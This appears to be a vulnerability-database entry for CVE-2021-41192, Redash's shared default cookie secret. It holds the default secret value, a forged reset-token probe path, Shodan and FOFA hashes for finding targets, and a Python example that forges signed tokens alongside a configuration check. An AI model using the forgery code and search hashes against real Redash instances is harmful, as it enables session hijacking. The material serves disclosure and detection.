CVE-2021-41192
published 2021-11-24


Priority: P3 (50)
Severity: medium, CVSS 3.1 base score 6.5
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Tags: EXPLOIT
EPSS: 8.02% (94.0th percentile)
Redash is a package for data visualization and sharing. If an admin sets up Redash versions 10.0.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. Because that value is the key with which Redash signs session cookies and other signed values, anyone who knows it can mint signatures the server will accept, so such an instance is vulnerable to attackers forging sessions using the known default.

This issue only affects installations where the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables have not been explicitly set. It does not affect users of the official Redash cloud images, Redash's Digital Ocean marketplace droplets, or the scripts in the `getredash/setup` repository; those installers generate unique secret keys during installation.

To verify whether an instance is affected, check the value of the `REDASH_COOKIE_SECRET` environment variable in the Redash process environment. If it is `c292a0a3aa32397cdb050e233733900f`, or the variable is not set at all (in which case that default is what the application uses), follow the steps to secure the instance outlined in the GitHub Security Advisory.

Affected (2 ranges)

Vendor     Product   Version range   Fixed in
getredash  redash    <= 10.0.0       -
redash     redash    <= 10.0.0       -

Detection & IOCs (extracted from sources)

url:    /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
url:    /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs
other:  shodan:http.favicon.hash:698624197
other:  fofa:icon_hash=698624197
  • Probe for vulnerable Redash instances by requesting the password-reset token path above (a token signed with the known default secret) and checking for an HTTP 200 response whose body contains both 'Enter your new password:' and 'redash'.
  • A 200 response carrying both strings means the instance accepted a token it never issued, i.e. it is still signing with the default cookie secret. A negative result is weaker evidence: timed tokens of this kind embed a timestamp, so an instance that enforces a maximum token age can reject a stale fixed token while still using the default secret; the environment-variable check below is authoritative.
  • Identify exposed Redash instances via Shodan favicon hash 698624197 or FOFA icon_hash=698624197 for targeting.
  • Check the REDASH_COOKIE_SECRET environment variable on any Redash installation; if it equals 'c292a0a3aa32397cdb050e233733900f', or is not set at all (in which case that default is used), the instance is vulnerable to session forgery.
  • The vulnerability only affects Redash installations where REDASH_COOKIE_SECRET or REDASH_SECRET_KEY were never explicitly set; official cloud images, Digital Ocean marketplace droplets, and getredash/setup scripts auto-generate unique keys and are NOT affected.
  • The default secret value 'c292a0a3aa32397cdb050e233733900f' is shared across ALL vulnerable installations, enabling an attacker to forge valid session cookies, and any other value signed with that secret, for any unpatched instance.
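To make the forgery and the check concrete, the following is an added example; it is not Redash's code or part of the advisory. Using only the standard library, it re-implements the URL-safe timed token format (base64 JSON payload, base64 timestamp, HMAC-SHA1 signature) that Flask applications such as Redash typically obtain from itsdangerous for reset tokens, and shows that whoever holds the secret can mint a token for any payload. The salt, the "django-concat" key derivation and HMAC-SHA1 are assumptions chosen to mirror that library's defaults; `forge_token`, `verify_token`, `instance_uses_default_secret` and `fresh_secret` are names of this example, not Redash APIs. One fact the example does illustrate exactly: serialising the JSON string "1" gives the segment `IjEi`, the first segment of the reset-token path listed above.

```python
"""Added example (not Redash's or the advisory's code): forging and checking
itsdangerous-style URL-safe timed tokens when the signing secret is a known
default, plus the configuration check the advisory describes."""
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Any, Mapping, Optional, Tuple

# Default value named in the advisory; identical on every affected install.
DEFAULT_COOKIE_SECRET = "c292a0a3aa32397cdb050e233733900f"


def _b64(data: bytes) -> str:
    """URL-safe base64 without padding, as used for each token segment."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive_key(secret: str, salt: bytes = b"itsdangerous") -> bytes:
    # Assumption: mirrors the library's default "django-concat" derivation,
    # sha1(salt + b"signer" + secret). Stdlib re-implementation, not the library.
    return hashlib.sha1(salt + b"signer" + secret.encode()).digest()


def forge_token(payload: Any, secret: str, timestamp: Optional[int] = None) -> str:
    """Mint a token of the form base64(json).base64(ts).base64(hmac_sha1).

    Anyone holding `secret` can do this for any payload, e.g. a user id.
    """
    ts = int(time.time()) if timestamp is None else timestamp
    body = _b64(json.dumps(payload, separators=(",", ":")).encode())
    ts_part = _b64(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed = f"{body}.{ts_part}".encode()
    sig = hmac.new(_derive_key(secret), signed, hashlib.sha1).digest()
    return f"{body}.{ts_part}.{_b64(sig)}"


def verify_token(token: str, secret: str, max_age: Optional[int] = None,
                 now: Optional[int] = None) -> Tuple[bool, Any]:
    """Return (True, payload) or (False, reason).

    Checks the HMAC first, then (if max_age is given) the embedded timestamp:
    a forged but correctly signed token only fails here when it is stale.
    """
    try:
        body, ts_part, sig_part = token.split(".")
        sig = _unb64(sig_part)
        ts = int.from_bytes(_unb64(ts_part), "big")
    except ValueError:  # wrong segment count or invalid base64
        return False, "malformed"
    expected = hmac.new(_derive_key(secret), f"{body}.{ts_part}".encode(),
                        hashlib.sha1).digest()
    if not hmac.compare_digest(expected, sig):
        return False, "bad signature"
    current = int(time.time()) if now is None else now
    if max_age is not None and current - ts > max_age:
        return False, "expired"
    return True, json.loads(_unb64(body))


def instance_uses_default_secret(env: Mapping[str, str]) -> bool:
    """The advisory's check: REDASH_COOKIE_SECRET unset or equal to the default."""
    return env.get("REDASH_COOKIE_SECRET", DEFAULT_COOKIE_SECRET) == DEFAULT_COOKIE_SECRET


def fresh_secret() -> str:
    """A per-installation replacement; rotating it invalidates existing sessions."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    # Attacker side: the string "1" serialises to the segment "IjEi", the same
    # prefix as the reset-token path listed under Detection & IOCs.
    forged = forge_token("1", DEFAULT_COOKIE_SECRET)
    print("forged:", forged)
    # Server still on the default secret: the token it never issued verifies.
    print("default secret accepts it:", verify_token(forged, DEFAULT_COOKIE_SECRET, max_age=3600))
    # Same server after setting a unique secret: rejected.
    print("unique secret rejects it:", verify_token(forged, fresh_secret()))
    # Config check against a constructed sample environment (use os.environ in practice).
    print("vulnerable:", instance_uses_default_secret({"REDASH_COOKIE_SECRET": DEFAULT_COOKIE_SECRET}))
```

The `max_age` path is why the probe bullet above is only positive evidence: a fixed token minted long ago can be rejected as expired by a server that still uses the default secret, whereas `instance_uses_default_secret` answers directly from the configuration.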

CVSS provenance

Source  Version  Score  Severity  Vector
nvd     v3.1     6.5    MEDIUM    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
nvd     v2.0     3.5    LOW       AV:N/AC:M/Au:S/C:N/I:P/A:N